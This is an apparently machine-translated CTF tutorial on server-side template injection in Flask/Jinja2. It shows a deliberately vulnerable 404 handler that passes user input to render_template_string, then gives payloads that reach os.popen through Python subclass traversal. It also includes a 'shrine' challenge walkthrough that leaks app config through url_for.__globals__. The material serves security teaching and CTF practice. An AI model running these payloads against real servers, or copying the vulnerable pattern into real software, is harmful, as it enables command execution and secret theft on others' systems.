SSTI template injection explanation and real problem practice

0x00 SSTI

1. What is? SSTI Inject ？
SSTI Template Injection (Server-Side Template Injection), Through the interface with the server-side template Input output interaction , In the case of lax filtering , Construct malicious input data , So as to read files or getshell Purpose , at present CTF common SSTI In question , Most of them are exams python Of .

2. Causes and utilization conditions
The website processes the output pages by the data and template framework , Our data will not change in the database , But the template of the picture can be converted in various ways , Different templates can give people different visual feelings , But when the template has controllable parameter variables or the template code has the debugging function of the template , May lead to ssti Template Injection , This injection exists for most script types . It's common for python Of CTF More test sites

3. What are the hazards ？
It can cause file reading , Command execution , Code execution, etc
paylaod Analytical reference ：

0x01 Case understanding SSTI

Sensitive function phrases ：
flask
render_template_string

Python Case study ：

from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)

app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
    return 'Hello World!'

@app.errorhandler(404)
def page_not_found(e):
    template = '''
{%% block body %%}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>     #%s obtain 404_url Parameter the contents of the following fields , So as to input controllable variable injection 
    </div> 
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404

if __name__ == '__main__':
    app.run(host='0.0.0.0',debug=True)

Can be python Script execution , Injection of being

adopt payload type , can RCE Read files and operate the machine

os._wrap_close In the class popen.
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()

0x02 CTF Case study

https://buuoj.cn/

Title Page ：

structure 2-2 perform , That there is ssti Injection execution

View all global variables , Reference global variables

Use global variables to get the following config value

url_for() Function is used to build the specified function of operation URL
get_flashed_messages() The function is to get the passed data

 Get global variables 
/shrine/{
   {url_for.__globals__}}  
 or 
/shrine/{
   {get_flashed_messages.__globals__}}
 Use the current global variable to read ：
/shrine/{
   {url_for.__globals__['current_app'].config}}
 or 
/shrine/{
   {get_flashed_messages.__globals__['current_app'].config}}

Add ： pyc Decompile knowledge points

pyc It is also a form of script encapsulation , Be similar to
aspx：DLL file
java：.class/jar/war file
pyc Is a decompilable package , There are also those that are difficult to decompile pyd Wait for the documents
pyc Decompile reference website ：
Decompile platform ：
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
decompiler ：https://github.com/wibiti/uncompyle2